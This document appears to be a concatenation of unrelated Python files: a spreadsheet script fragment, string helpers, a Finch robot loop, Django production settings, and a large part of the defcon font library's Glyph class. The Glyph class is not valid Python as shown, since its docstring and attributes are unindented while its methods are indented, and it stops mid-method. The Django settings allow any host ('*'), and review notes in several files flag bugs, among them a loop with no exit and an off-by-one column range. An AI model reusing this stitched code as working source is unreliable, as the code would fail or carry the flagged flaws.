                sheet.write_string(0, 3 * i + 3, ' ')
        if read_data:
            # NOTE(review): dim_colmax is the highest column *index*, so
            # range(dim_colmax) skips the last column -- confirm whether
            # range(dim_colmax + 1) was intended.
            for colnum in range(sheet.dim_colmax):
                sheet.set_column(colnum, colnum, colwidths[sheet.name][colnum])
    week_book.close()
print('Week ' + str(week_number) + ' predictions calculated in ' + str(round((time.time() - week_timer) / 60, 2)) + ' minutes')
|
import random
import string
from six import string_types
from six import text_type
from six import PY3 as python_3
def parse_args(instance, method, ignore_py3=False):
    """Decorator factory: convert matching arguments before the call.

    Every positional or keyword argument that is an instance of
    *instance* is passed through *method* first; everything else is
    forwarded untouched.  With ignore_py3=True the decorated function is
    returned as-is when running on Python 3.
    """
    def parser(func):
        if ignore_py3 and python_3:
            return func
        def wrapper(*args, **kwargs):
            converted_args = [method(arg) if isinstance(arg, instance) else arg
                              for arg in args]
            converted_kwargs = {key: method(val) if isinstance(val, instance) else val
                                for key, val in kwargs.items()}
            return func(*converted_args, **converted_kwargs)
        return wrapper
    return parser
# Ready-made decorators: `lower` lower-cases every string argument; on
# Python 2 `normalize` UTF-8-encodes text_type arguments (skipped entirely
# on Python 3 via ignore_py3=True).
lower = parse_args(string_types, str.lower)
normalize = parse_args(text_type, lambda txt: txt.encode('utf-8'), True)
def split(string, slen):
    """Split *string* into consecutive chunks of at most *slen* characters.

    Returns [string] unchanged (including for the empty string) when it
    already fits in one chunk.  *slen* must be a positive integer.
    Replaces the original hand-rolled chunk-count arithmetic with a
    stride-slicing comprehension; output is identical.
    """
    if len(string) <= slen:
        return [string]
    return [string[i:i + slen] for i in range(0, len(string), slen)]
def part(string, parts, mark=''):
    """Split *string* into chunks of *parts* characters, prefixing every
    chunk after the first with *mark*.

    Returns ``[]`` when *parts* is not positive and ``[string]`` when the
    string already fits in a single chunk.
    """
    if parts <= 0:
        return []
    elif len(string) <= parts:
        return [string]
    markl = len(mark)
    # Chunk count, rounded up. The mark length is added to the total only
    # once even though the mark is prepended to every chunk after the
    # first, so marked chunks are markl + parts characters long.
    # NOTE(review): with a non-empty mark this can produce a trailing
    # chunk that is just the mark itself -- confirm this is intended.
    total_parts = float(len(string) + markl) / parts
    if not total_parts.is_integer():
        total_parts += 1
    total_parts = int(total_parts)
    part = 0        # 1-based index of the chunk being built
    init_point = 0  # start offset into the source string
    splits = []
    while 1:
        part += 1
        if part == total_parts:
            # Final chunk takes whatever remains of the string.
            splits.append(mark + string[init_point:])
            break
        elif init_point == 0:
            # First chunk carries no mark.
            splits.append(string[:parts])
            init_point += parts
        else:
            splits.append(mark + string[init_point:(init_point + parts)])
            init_point += parts
    return splits
def randphras(l=5, upper=True, lower=True, digit=True, punct=False, nofd=False):
    """Return a random phrase of length *l* drawn from the enabled pools.

    The flags enable uppercase letters, lowercase letters, digits and
    punctuation. When *nofd* is true the first character is always a
    lowercase letter (e.g. so identifiers never start with a digit).
    Raises IndexError if every pool is disabled.
    """
    # Collect the enabled character pools. A pool is chosen uniformly for
    # each character, then a character uniformly within it -- the same
    # two-step distribution as the original, but without eval().
    pools = []
    if punct:
        pools.append(string.punctuation)
    if upper:
        pools.append(string.ascii_uppercase)
    if lower:
        pools.append(string.ascii_lowercase)
    if digit:
        pools.append(string.digits)
    phrass = ''
    for _ in range(l):
        if not phrass and nofd:
            char = random.choice(string.ascii_lowercase)
        else:
            char = random.choice(random.choice(pools))
        phrass += char
    return phrass
|
# Drive a Finch robot forward while continuously sampling its
# accelerometer, collecting the readings in accList.
from finch import Finch
from time import sleep
from random import randint
tweety = Finch()
accList = []  # list of [x, y, z] accelerometer samples
left, right = tweety.obstacle()
# Start both wheels; left slightly slower than right.
tweety.wheels(.46, .5)
# NOTE(review): this loop has no exit condition, so the stop/print/close
# code below is unreachable -- add a break (e.g. on obstacle or tap).
while 1:
    x,y,z,tap,shake = tweety.acceleration()
    acc = [x, y, z]
    accList.append(acc)
    # print ("X : ", x)
    # print ("Y : ", y)
    # print ("Z : ", z)
    left, right = tweety.obstacle()
    #sleep(.5)
# Stop the wheels, dump the collected samples and release the robot.
tweety.wheels(0.0,0.0)
print(accList)
tweety.close()
|
# Production Django settings: extends the shared base settings.
from settings.common import *
# Use the live database credentials from the project's secrets.
DATABASES = {
    'default': SECRETS_DICT['DATABASES']['LIVE']
}
# Trust the proxy's X-Forwarded-Proto header to detect HTTPS requests.
SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')
# NOTE(review): '*' accepts any Host header; restrict to the real
# domain(s) if the deployment allows it.
ALLOWED_HOSTS = ['*']
# Static files are collected into ./staticfiles and served under /static/.
STATIC_ROOT = 'staticfiles'
STATIC_URL = '/static/'
STATICFILES_DIRS = (
    os.path.join(PROJECT_PATH, 'static'),
)
|
from __future__ import absolute_import
import weakref
from warnings import warn
from fontTools.misc.py23 import basestring
from fontTools.misc.arrayTools import unionRect
from defcon.objects.base import BaseObject
from defcon.objects.contour import Contour
from defcon.objects.point import Point
from defcon.objects.component import Component
from defcon.objects.anchor import Anchor
from defcon.objects.lib import Lib
from defcon.objects.guideline import Guideline
from defcon.objects.image import Image
from defcon.objects.color import Color
from defcon.tools.representations import glyphAreaRepresentationFactory
from defcon.pens.decomposeComponentPointPen import DecomposeComponentPointPen
def addRepresentationFactory(name, factory):
    """Deprecated module-level registration hook for glyph representations."""
    warn("addRepresentationFactory is deprecated. Use the functions in defcon.__init__.", DeprecationWarning)
    Glyph.representationFactories[name] = {
        "factory": factory,
        "destructiveNotifications": ["Glyph.Changed"],
    }
def removeRepresentationFactory(name):
    """Deprecated module-level de-registration hook for glyph representations."""
    warn("removeRepresentationFactory is deprecated. Use the functions in defcon.__init__.", DeprecationWarning)
    Glyph.representationFactories.pop(name)
class Glyph(BaseObject):
"""
This object represents a glyph and it contains contour, component, anchor
and other assorted bits data about the glyph.
**This object posts the following notifications:**
============================
Name
============================
Glyph.Changed
Glyph.BeginUndo
Glyph.EndUndo
Glyph.BeginRedo
Glyph.EndRedo
Glyph.NameWillChange
Glyph.NameChanged
Glyph.UnicodesChanged
Glyph.WidthChanged
Glyph.HeightChanged
Glyph.NoteChanged
Glyph.LibChanged
Glyph.ImageChanged
Glyph.ImageWillBeDeleted
Glyph.ContourWillBeAdded
Glyph.ContourWillBeDeleted
Glyph.ContoursChanged
Glyph.ComponentWillBeAdded
Glyph.ComponentWillBeDeleted
Glyph.ComponentsChanged
Glyph.AnchorWillBeAdded
Glyph.AnchorWillBeDeleted
Glyph.AnchorsChanged
Glyph.GuidelineWillBeAdded
Glyph.GuidelineWillBeDeleted
Glyph.GuidelinesChanged
Glyph.MarkColorChanged
Glyph.VerticalOriginChanged
============================
The Glyph object has list like behavior. This behavior allows you to interact
with contour data directly. For example, to get a particular contour::
contour = glyph[0]
To iterate over all contours::
for contour in glyph:
To get the number of contours::
contourCount = len(glyph)
To interact with components or anchors in a similar way,
use the ``components`` and ``anchors`` attributes.
"""
changeNotificationName = "Glyph.Changed"
beginUndoNotificationName = "Glyph.BeginUndo"
endUndoNotificationName = "Glyph.EndUndo"
beginRedoNotificationName = "Glyph.BeginRedo"
endRedoNotificationName = "Glyph.EndRedo"
representationFactories = {
"defcon.glyph.area" : dict(
factory=glyphAreaRepresentationFactory,
destructiveNotifications=("Glyph.ContoursChanged", "Glyph.ComponentsChanged", "Glyph.ComponentBaseGlyphDataChanged")
)
}
def __init__(self, layer=None,
             contourClass=None, pointClass=None, componentClass=None, anchorClass=None,
             guidelineClass=None, libClass=None, imageClass=None):
    """Initialize an empty glyph, optionally bound to *layer*.

    The ``*Class`` arguments allow custom subclasses to be substituted
    for the stock defcon contour, point, component, anchor, guideline,
    lib and image objects.
    """
    # Hold the parent chain (font, layer set, layer) as weak references
    # so a glyph does not keep its owners alive.
    layerSet = font = None
    if layer is not None:
        layerSet = layer.layerSet
        if layerSet is not None:
            font = weakref.ref(layer.layerSet.font)
            layerSet = weakref.ref(layer.layerSet)
        layer = weakref.ref(layer)
    self._font = font
    self._layerSet = layerSet
    self._layer = layer
    super(Glyph, self).__init__()
    self.beginSelfNotificationObservation()
    self._isLoading = False
    self._dirty = False
    # Basic glyph attributes.
    self._name = None
    self._unicodes = []
    self._width = 0
    self._height = 0
    self._note = None
    self._image = None
    # All contour/point/component/anchor/guideline identifiers in use.
    self._identifiers = set()
    # Raw contour data kept until the contours are fully instantiated.
    self._shallowLoadedContours = None
    self._contours = []
    self._components = []
    self._anchors = []
    self._guidelines = []
    self._lib = None
    # Fall back to the stock defcon classes when none are supplied.
    if contourClass is None:
        contourClass = Contour
    if pointClass is None:
        pointClass = Point
    if componentClass is None:
        componentClass = Component
    if anchorClass is None:
        anchorClass = Anchor
    if guidelineClass is None:
        guidelineClass = Guideline
    if libClass is None:
        libClass = Lib
    if imageClass is None:
        imageClass = Image
    self._contourClass = contourClass
    self._pointClass = pointClass
    self._componentClass = componentClass
    self._anchorClass = anchorClass
    self._guidelineClass = guidelineClass
    self._libClass = libClass
    self._imageClass = imageClass
def __del__(self):
    """Drop sub-object references on deletion to help break cycles."""
    super(Glyph, self).__del__()
    for attr in ("_contours", "_components", "_anchors",
                 "_guidelines", "_lib", "_image"):
        setattr(self, attr, None)
# --------------
# Parent Objects
# --------------
def getParent(self):
    # Legacy accessor: the parent of a glyph is its font.
    return self.font
def _get_font(self):
    """Dereference the weakly-held font, or None when unowned."""
    ref = self._font
    return None if ref is None else ref()

font = property(_get_font, doc="The :class:`Font` that this glyph belongs to.")
def _get_layerSet(self):
    """Dereference the weakly-held layer set, or None when unowned."""
    ref = self._layerSet
    return None if ref is None else ref()

layerSet = property(_get_layerSet, doc="The :class:`LayerSet` that this glyph belongs to.")
def _get_layer(self):
    """Dereference the weakly-held layer, or None when unowned."""
    ref = self._layer
    return None if ref is None else ref()

layer = property(_get_layer, doc="The :class:`Layer` that this glyph belongs to.")
# ----------------
# Basic Attributes
# ----------------
# identifiers
def _get_identifiers(self):
    # Live set -- mutations made by insert/remove methods are visible here.
    return self._identifiers

identifiers = property(_get_identifiers, doc="Set of identifiers for the glyph. This is primarily for internal use.")
# name
def _set_name(self, value):
    # Post the will-change notification before mutating so observers can
    # still see the old name via the glyph itself.
    oldName = self._name
    if oldName != value:
        self.postNotification(notification="Glyph.NameWillChange", data=dict(oldValue=oldName, newValue=value))
        self._name = value
        self.postNotification(notification="Glyph.NameChanged", data=dict(oldValue=oldName, newValue=value))
        self.dirty = True

def _get_name(self):
    return self._name

# Fixed doc typo: the posted notifications are NameWillChange/NameChanged.
name = property(_get_name, _set_name, doc="The name of the glyph. Setting this posts *Glyph.NameWillChange*, *Glyph.NameChanged* and *Glyph.Changed* notifications.")
# unicodes
def _get_unicodes(self):
    # Return a copy so callers cannot mutate the internal list.
    return list(self._unicodes)

def _set_unicodes(self, value):
    oldValue = self.unicodes
    if oldValue != value:
        self._unicodes = value
        self.postNotification(notification="Glyph.UnicodesChanged", data=dict(oldValue=oldValue, newValue=value))
        self.dirty = True

unicodes = property(_get_unicodes, _set_unicodes, doc="The list of unicode values assigned to the glyph. Setting this posts *Glyph.UnicodesChanged* and *Glyph.Changed* notifications.")
def _get_unicode(self):
    # Primary value is simply the first entry, when any exist.
    if self._unicodes:
        return self._unicodes[0]
    return None

def _set_unicode(self, value):
    if value is None:
        self.unicodes = []
    else:
        # Move (or insert) the value to the front of the list, then go
        # through the unicodes setter so notifications are posted.
        existing = list(self._unicodes)
        if value in existing:
            existing.remove(value)
        existing.insert(0, value)
        self.unicodes = existing

unicode = property(_get_unicode, _set_unicode, doc="The primary unicode value for the glyph. This is the equivalent of ``glyph.unicodes[0]``. This is a convenience attribute that works with the ``unicodes`` attribute.")
# -------
# Metrics
# -------
# bounds
def _getContourComponentBounds(self, attr):
    """Union the *attr* bounding boxes of all contours and components."""
    bounds = None
    for subObject in list(self) + list(self.components):
        box = getattr(subObject, attr)
        if box is None:
            continue
        bounds = box if bounds is None else unionRect(bounds, box)
    return bounds
def _get_bounds(self):
    # Bounds measured on the actual curves.
    return self._getContourComponentBounds("bounds")

bounds = property(_get_bounds, doc="The bounds of the glyph's outline expressed as a tuple of form (xMin, yMin, xMax, yMax).")
def _get_controlPointBounds(self):
    # Bounds measured on point positions only (faster, less precise).
    return self._getContourComponentBounds("controlPointBounds")

controlPointBounds = property(_get_controlPointBounds, doc="The control bounds of all points in the glyph. This only measures the point positions, it does not measure curves. So, curves without points at the extrema will not be properly measured.")
# area
def _get_area(self):
    # Computed (and cached) through the representation machinery.
    return self.getRepresentation("defcon.glyph.area")

area = property(_get_area, doc="The area of the glyph's outline.")
# margins
def _get_leftMargin(self):
    # The left margin is the outline's xMin; None when there is no outline.
    bounds = self.bounds
    if bounds is None:
        return None
    xMin, yMin, xMax, yMax = bounds
    return xMin

def _set_leftMargin(self, value):
    bounds = self.bounds
    if bounds is None:
        return
    xMin, yMin, xMax, yMax = bounds
    oldValue = xMin
    diff = value - xMin
    if value != oldValue:
        # Shift the outline and grow/shrink the advance width to match.
        self.move((diff, 0))
        self.width += diff
        self.dirty = True

# Fixed doc typo ("post" -> "posts"), matching the sibling margin docs.
leftMargin = property(_get_leftMargin, _set_leftMargin, doc="The left margin of the glyph. Setting this posts *Glyph.WidthChanged* and *Glyph.Changed* notifications among others.")
def _get_rightMargin(self):
    """Space between the outline's xMax and the advance width."""
    bounds = self.bounds
    if bounds is None:
        return None
    xMax = bounds[2]
    return self._width - xMax

def _set_rightMargin(self, value):
    bounds = self.bounds
    if bounds is None:
        return
    xMax = bounds[2]
    if self._width - xMax != value:
        self.width = xMax + value
        self.dirty = True

rightMargin = property(_get_rightMargin, _set_rightMargin, doc="The right margin of the glyph. Setting this posts *Glyph.WidthChanged* and *Glyph.Changed* notifications among others.")
def _get_bottomMargin(self):
    # Measured from the vertical origin baseline (height when unset).
    bounds = self.bounds
    if bounds is None:
        return None
    xMin, yMin, xMax, yMax = bounds
    if self.verticalOrigin is None:
        return yMin
    else:
        return yMin - (self.verticalOrigin - self.height)

def _set_bottomMargin(self, value):
    bounds = self.bounds
    if bounds is None:
        return
    xMin, yMin, xMax, yMax = bounds
    # When no vertical origin is set, adopt the current height as the
    # origin so the bottom margin has a stable reference point.
    if self.verticalOrigin is None:
        oldValue = yMin
        self.verticalOrigin = self.height
    else:
        oldValue = yMin - (self.verticalOrigin - self.height)
    diff = value - oldValue
    if value != oldValue:
        self.height += diff
        self.dirty = True

# Fixed doc typo ("post" -> "posts"), matching the sibling margin docs.
bottomMargin = property(_get_bottomMargin, _set_bottomMargin, doc="The bottom margin of the glyph. Setting this posts *Glyph.HeightChanged* and *Glyph.Changed* notifications among others.")
def _get_topMargin(self):
    # Measured from the vertical origin (height when unset) down to yMax.
    bounds = self.bounds
    if bounds is None:
        return None
    xMin, yMin, xMax, yMax = bounds
    if self.verticalOrigin is None:
        return self._height - yMax
    else:
        return self.verticalOrigin - yMax

def _set_topMargin(self, value):
    bounds = self.bounds
    if bounds is None:
        return
    xMin, yMin, xMax, yMax = bounds
    if self.verticalOrigin is None:
        oldValue = self._height - yMax
    else:
        oldValue = self.verticalOrigin - yMax
    diff = value - oldValue
    if oldValue != value:
        # Move the origin up/down and grow the height by the same amount
        # so the bottom margin is unaffected.
        self.verticalOrigin = yMax + value
        self.height += diff
        self.dirty = True

topMargin = property(_get_topMargin, _set_topMargin, doc="The top margin of the glyph. Setting this posts *Glyph.HeightChanged*, *Glyph.VerticalOriginChanged* and *Glyph.Changed* notifications among others.")
# width
def _get_width(self):
    return self._width

def _set_width(self, value):
    """Assign a new advance width, notifying observers on change."""
    if self._width == value:
        return
    oldValue = self._width
    self._width = value
    self.postNotification(notification="Glyph.WidthChanged", data=dict(oldValue=oldValue, newValue=value))
    self.dirty = True

width = property(_get_width, _set_width, doc="The width of the glyph. Setting this posts *Glyph.WidthChanged* and *Glyph.Changed* notifications.")
# height
def _get_height(self):
    return self._height

def _set_height(self, value):
    """Assign a new advance height, notifying observers on change."""
    if self._height == value:
        return
    oldValue = self._height
    self._height = value
    self.postNotification(notification="Glyph.HeightChanged", data=dict(oldValue=oldValue, newValue=value))
    self.dirty = True

height = property(_get_height, _set_height, doc="The height of the glyph. Setting this posts *Glyph.HeightChanged* and *Glyph.Changed* notifications.")
# ----------------------
# Lib Wrapped Attributes
# ----------------------
# mark color
def _get_markColor(self):
    # Stored in the glyph lib under the UFO-standard key.
    value = self.lib.get("public.markColor")
    if value is not None:
        value = Color(value)
    return value

def _set_markColor(self, value):
    # convert to a color object
    if value is not None:
        value = Color(value)
    # don't write if there is no change
    oldValue = self.lib.get("public.markColor")
    if oldValue is not None:
        oldValue = Color(oldValue)
    if value == oldValue:
        return
    # remove
    if value is None:
        if "public.markColor" in self.lib:
            del self.lib["public.markColor"]
    # store
    else:
        self.lib["public.markColor"] = value
    self.postNotification(notification="Glyph.MarkColorChanged", data=dict(oldValue=oldValue, newValue=value))

markColor = property(_get_markColor, _set_markColor, doc="The glyph's mark color. When setting, the value can be a UFO color string, a sequence of (r, g, b, a) or a :class:`Color` object. Setting this posts *Glyph.MarkColorChanged* and *Glyph.Changed* notifications.")
# vertical origin
def _get_verticalOrigin(self):
    # Stored in the glyph lib under the UFO-standard key; may be None.
    value = self.lib.get("public.verticalOrigin")
    return value

def _set_verticalOrigin(self, value):
    # don't write if there is no change
    oldValue = self.lib.get("public.verticalOrigin")
    if value == oldValue:
        return
    # remove
    if value is None:
        if "public.verticalOrigin" in self.lib:
            del self.lib["public.verticalOrigin"]
    # store
    else:
        self.lib["public.verticalOrigin"] = value
    self.postNotification(notification="Glyph.VerticalOriginChanged", data=dict(oldValue=oldValue, newValue=value))

verticalOrigin = property(_get_verticalOrigin, _set_verticalOrigin, doc="The glyph's vertical origin. Setting this posts *Glyph.VerticalOriginChanged* and *Glyph.Changed* notifications.")
# -------
# Pen API
# -------
def draw(self, pen):
    """Draw the glyph into the segment pen *pen*."""
    from fontTools.pens.pointPen import PointToSegmentPen
    self.drawPoints(PointToSegmentPen(pen))
def drawPoints(self, pointPen):
    """Draw the glyph into the point pen *pointPen*."""
    shallow = self._shallowLoadedContours
    if shallow:
        self._drawShallowLoadedContours(pointPen, shallow)
    else:
        for contour in self._contours:
            contour.drawPoints(pointPen)
    for component in self._components:
        component.drawPoints(pointPen)
def _drawShallowLoadedContours(self, pointPen, contours):
    """Replay raw (not yet instantiated) contour data into *pointPen*."""
    for contour in contours:
        try:
            pointPen.beginPath(identifier=contour.get("identifier"))
        except TypeError:
            # Older pens do not accept the identifier kwarg.
            pointPen.beginPath()
            warn("The beginPath method needs an identifier kwarg. The contour's identifier value has been discarded.", DeprecationWarning)
        for args, kwargs in contour["points"]:
            pointPen.addPoint(*args, **kwargs)
        pointPen.endPath()
def getPen(self):
    """Return a segment pen that draws into this glyph."""
    from fontTools.pens.pointPen import SegmentToPointPen
    pointPen = self.getPointPen()
    return SegmentToPointPen(pointPen)
def getPointPen(self):
    """Return a point pen that draws into this glyph.

    During loading a shallow-loading pen is used, which stores raw
    point data for later instantiation.
    """
    from defcon.pens.glyphObjectPointPen import GlyphObjectPointPen, GlyphObjectLoadingPointPen
    if not self._isLoading:
        return GlyphObjectPointPen(self)
    self._shallowLoadedContours = []
    return GlyphObjectLoadingPointPen(self)
# --------
# Contours
# --------
def _get_contourClass(self):
    # Class used when instantiating new contours for this glyph.
    return self._contourClass

contourClass = property(_get_contourClass, doc="The class used for contours.")

def _get_pointClass(self):
    # Class used when instantiating new points.
    return self._pointClass

pointClass = property(_get_pointClass, doc="The class used for points.")
def _fullyLoadShallowLoadedContours(self):
    """Instantiate real contour objects from stored shallow contour data."""
    if not self._shallowLoadedContours:
        self._shallowLoadedContours = None
        return
    # Replay the raw data through the normal point pen without posting
    # notifications, and restore the dirty flag afterwards so loading
    # does not mark the glyph as modified.
    self.disableNotifications()
    contours = list(self._shallowLoadedContours)
    self._shallowLoadedContours = None
    dirty = self.dirty
    pointPen = self.getPointPen()
    self._drawShallowLoadedContours(pointPen, contours)
    self.dirty = dirty
    self.enableNotifications()
def instantiateContour(self):
    """Create a new, empty contour of this glyph's contour class."""
    return self._contourClass(glyph=self, pointClass=self.pointClass)
def beginSelfContourNotificationObservation(self, contour):
    """Subscribe this glyph to the contour's change notifications."""
    if contour.dispatcher is not None:
        contour.addObserver(observer=self, methodName="_contourChanged", notification="Contour.Changed")

def endSelfContourNotificationObservation(self, contour):
    """Unsubscribe from the contour and tear down its own observation."""
    if contour.dispatcher is not None:
        contour.removeObserver(observer=self, notification="Contour.Changed")
        contour.endSelfNotificationObservation()
def appendContour(self, contour):
    """
    Add **contour** at the end of the glyph's contour list. The contour
    must be a defcon :class:`Contour` (or subclass) and its identifier,
    and those of its points, must not clash with identifiers already in
    the glyph.
    This will post a *Glyph.Changed* notification.
    """
    self.insertContour(len(self), contour)
def insertContour(self, index, contour):
    """
    Insert **contour** into the glyph at index. The contour
    must be a defcon :class:`Contour` object or a subclass
    of that object. An error will be raised if the contour's
    identifier or a point identifier conflicts with any of
    the identifiers within the glyph.
    This will post a *Glyph.Changed* notification.
    """
    assert contour not in self
    assert contour.glyph in (self, None), "This contour belongs to another glyph."
    self.postNotification(notification="Glyph.ContourWillBeAdded", data=dict(object=contour))
    if contour.glyph is None:
        # Adopt the contour: register its identifiers (and those of its
        # points), then take ownership and begin observing it.
        identifiers = self._identifiers
        if contour.identifier is not None:
            assert contour.identifier not in identifiers
            identifiers.add(contour.identifier)
        for point in contour:
            if point.identifier is not None:
                assert point.identifier not in identifiers
                identifiers.add(point.identifier)
        contour.glyph = self
        contour.beginSelfNotificationObservation()
    self.beginSelfContourNotificationObservation(contour)
    self._contours.insert(index, contour)
    self.postNotification(notification="Glyph.ContoursChanged")
    self.dirty = True
def removeContour(self, contour):
    """
    Remove **contour** from the glyph.
    This will post a *Glyph.Changed* notification.
    """
    if contour not in self:
        raise IndexError("contour not in glyph")
    self.postNotification(notification="Glyph.ContourWillBeDeleted", data=dict(object=contour))
    # Release the contour's (and its points') identifiers for reuse.
    identifiers = self._identifiers
    if contour.identifier is not None:
        identifiers.remove(contour.identifier)
    for point in contour:
        if point.identifier is not None:
            identifiers.remove(point.identifier)
    self._contours.remove(contour)
    self.endSelfContourNotificationObservation(contour)
    self.postNotification(notification="Glyph.ContoursChanged")
    self.dirty = True
def contourIndex(self, contour):
    """Return the position of **contour** within the glyph."""
    return self._getContourIndex(contour)
def clearContours(self):
    """Remove every contour from the glyph (posts *Glyph.Changed*)."""
    self.holdNotifications(note="Requested by Glyph.clearContours.")
    for contour in list(self)[::-1]:
        self.removeContour(contour)
    self.releaseHeldNotifications()
def correctContourDirection(self, trueType=False, segmentLength=10):
    """
    Correct the direction of all contours in the glyph.
    Outer contours become counter-clockwise (PostScript convention) and
    each level of nesting alternates; pass ``trueType=True`` to flip all
    directions to the TrueType convention afterwards.
    This posts a *Glyph.Changed* notification.
    """
    # set the contours to the same direction
    for contour in self:
        contour.clockwise = False
    # sort the contours by area in reverse (i.e. largest first)
    contours = sorted(self, key=lambda contour: -contour.area)
    # build a tree of nested contours
    tree = {}
    for largeIndex, largeContour in enumerate(contours):
        for smallContour in contours[largeIndex + 1:]:
            if largeContour.contourInside(smallContour, segmentLength=segmentLength):
                if largeContour not in tree:
                    tree[largeContour] = []
                tree[largeContour].append(smallContour)
    # run through the tree, largest to smallest, flipping
    # the direction of each contour nested within another contour
    for largeContour in contours:
        if largeContour in tree:
            for smallContour in tree[largeContour]:
                smallContour.reverse()
    # set to the opposite if needed
    if trueType:
        for contour in self:
            contour.reverse()
# ----------
# Components
# ----------
def _get_componentClass(self):
    # Class used when instantiating new components.
    return self._componentClass

componentClass = property(_get_componentClass, doc="The class used for components.")

def _get_components(self):
    # Return a copy so callers cannot mutate the internal list.
    return list(self._components)

components = property(_get_components, doc="An ordered list of :class:`Component` objects stored in the glyph.")
def instantiateComponent(self):
    """Create a new, empty component of this glyph's component class."""
    return self._componentClass(glyph=self)
def beginSelfComponentNotificationObservation(self, component):
    """Subscribe this glyph to the component's notifications."""
    if component.dispatcher is not None:
        component.addObserver(observer=self, methodName="_componentChanged", notification="Component.Changed")
        component.addObserver(observer=self, methodName="_componentBaseGlyphDataChanged", notification="Component.BaseGlyphDataChanged")

def endSelfComponentNotificationObservation(self, component):
    """Unsubscribe from the component and tear down its own observation."""
    if component.dispatcher is not None:
        component.removeObserver(observer=self, notification="Component.Changed")
        component.removeObserver(observer=self, notification="Component.BaseGlyphDataChanged")
        component.endSelfNotificationObservation()
def appendComponent(self, component):
    """
    Add **component** at the end of the glyph's component list. The
    component must be a defcon :class:`Component` (or subclass) and its
    identifier must not clash with identifiers already in the glyph.
    This will post a *Glyph.Changed* notification.
    """
    self.insertComponent(len(self._components), component)
def insertComponent(self, index, component):
    """
    Insert **component** into the glyph at index. The component
    must be a defcon :class:`Component` object or a subclass
    of that object. An error will be raised if the component's
    identifier conflicts with any of the identifiers within
    the glyph.
    This will post a *Glyph.Changed* notification.
    """
    assert component not in self._components
    assert component.glyph in (self, None), "This component belongs to another glyph."
    self.postNotification(notification="Glyph.ComponentWillBeAdded", data=dict(object=component))
    if component.glyph is None:
        # Adopt the component: register its identifier, then take
        # ownership and begin observing it.
        if component.identifier is not None:
            identifiers = self._identifiers
            assert component.identifier not in identifiers
            identifiers.add(component.identifier)
        component.glyph = self
        component.beginSelfNotificationObservation()
    self.beginSelfComponentNotificationObservation(component)
    self._components.insert(index, component)
    self.postNotification(notification="Glyph.ComponentsChanged")
    self.dirty = True
def removeComponent(self, component):
    """
    Remove **component** from the glyph.
    This will post a *Glyph.Changed* notification.
    """
    self.postNotification(notification="Glyph.ComponentWillBeDeleted", data=dict(object=component))
    # Release the component's identifier for reuse.
    if component.identifier is not None:
        self._identifiers.remove(component.identifier)
    self._components.remove(component)
    self.endSelfComponentNotificationObservation(component)
    self.postNotification(notification="Glyph.ComponentsChanged")
    self.dirty = True
def componentIndex(self, component):
    """Return the position of **component** within the glyph."""
    return self._components.index(component)
def clearComponents(self):
    """Remove every component from the glyph (posts *Glyph.Changed*)."""
    self.holdNotifications(note="Requested by Glyph.clearComponents.")
    for component in list(self._components)[::-1]:
        self.removeComponent(component)
    self.releaseHeldNotifications()
def decomposeComponent(self, component):
    """
    Decompose **component**. This will preserve the identifiers
    in the incoming contours and points unless there is a conflict.
    In that case, the conflicting incoming identifier will be discarded.
    This posts *Glyph.ComponentsChanged*, *Glyph.ContoursChanged*
    and *Glyph.Changed* notifications.
    """
    self.holdNotifications(note="Requested by Glyph.decomposeComponent.")
    layer = self.layer
    pointPen = DecomposeComponentPointPen(self, layer)
    self._decomposeComponent(component, layer, pointPen)
    self.releaseHeldNotifications()
    self.postNotification(notification="Glyph.ContoursChanged")
def decomposeAllComponents(self):
    """
    Decompose all components in this glyph. This will preserve the
    identifiers in the incoming contours and points unless there is a
    conflict. In that case, the conflicting incoming identifier will
    be discarded.
    This posts *Glyph.ComponentsChanged*, *Glyph.ContoursChanged*
    and *Glyph.Changed* notifications.
    """
    if not self.components:
        return
    self.holdNotifications(note="Requested by Glyph.decomposeAllComponents.")
    layer = self.layer
    pointPen = DecomposeComponentPointPen(self, layer)
    # self.components is a copy, so removing while iterating is safe.
    for component in self.components:
        self._decomposeComponent(component, layer, pointPen)
    self.releaseHeldNotifications()
    self.postNotification(notification="Glyph.ContoursChanged")
def _decomposeComponent(self, component, layer, pointPen):
    """Draw one component's outline into the glyph, then remove it."""
    # Drop incoming identifiers that clash with existing ones.
    pointPen.skipConflictingIdentifiers = True
    component.drawPoints(pointPen)
    self.removeComponent(component)
# -------
# Anchors
# -------
def _get_anchorClass(self):
    # Class used when instantiating new anchors.
    return self._anchorClass

anchorClass = property(_get_anchorClass, doc="The class used for anchors.")

def _get_anchors(self):
    # Return a copy so callers cannot mutate the internal list.
    return list(self._anchors)

def _set_anchors(self, value):
    # Replace all anchors, batching the resulting notifications.
    self.clearAnchors()
    self.holdNotifications(note="Requested by Glyph._set_anchors.")
    for anchor in value:
        self.appendAnchor(anchor)
    self.releaseHeldNotifications()

anchors = property(_get_anchors, _set_anchors, doc="An ordered list of :class:`Anchor` objects stored in the glyph.")
def instantiateAnchor(self, anchorDict=None):
    """Create a new anchor of this glyph's anchor class, optionally from a dict."""
    return self._anchorClass(anchorDict=anchorDict)
def beginSelfAnchorNotificationObservation(self, anchor):
    """Subscribe this glyph to the anchor's change notifications."""
    if anchor.dispatcher is not None:
        anchor.addObserver(observer=self, methodName="_anchorChanged", notification="Anchor.Changed")

def endSelfAnchorNotificationObservation(self, anchor):
    """Unsubscribe from the anchor and tear down its own observation."""
    if anchor.dispatcher is not None:
        anchor.removeObserver(observer=self, notification="Anchor.Changed")
        anchor.endSelfNotificationObservation()
def appendAnchor(self, anchor):
    """
    Add **anchor** at the end of the glyph's anchor list. The anchor
    must be a defcon :class:`Anchor` (or subclass) and its identifier
    must not clash with identifiers already in the glyph.
    This will post a *Glyph.Changed* notification.
    """
    self.insertAnchor(len(self._anchors), anchor)
def insertAnchor(self, index, anchor):
    """
    Insert **anchor** into the glyph at index. The anchor
    must be a defcon :class:`Anchor` object or a subclass
    of that object. An error will be raised if the anchor's
    identifier conflicts with any of the identifiers within
    the glyph.
    This will post a *Glyph.Changed* notification.
    """
    # The incoming value may be a plain dict (no .glyph attribute);
    # in that case the ownership assertion is skipped.
    try:
        assert anchor.glyph is None
    except AttributeError:
        pass
    self.postNotification(notification="Glyph.AnchorWillBeAdded")
    # Convert dicts (or foreign anchor types) to this glyph's anchor class.
    if not isinstance(anchor, self._anchorClass):
        anchor = self.instantiateAnchor(anchorDict=anchor)
    if anchor.identifier is not None:
        identifiers = self._identifiers
        assert anchor.identifier not in identifiers
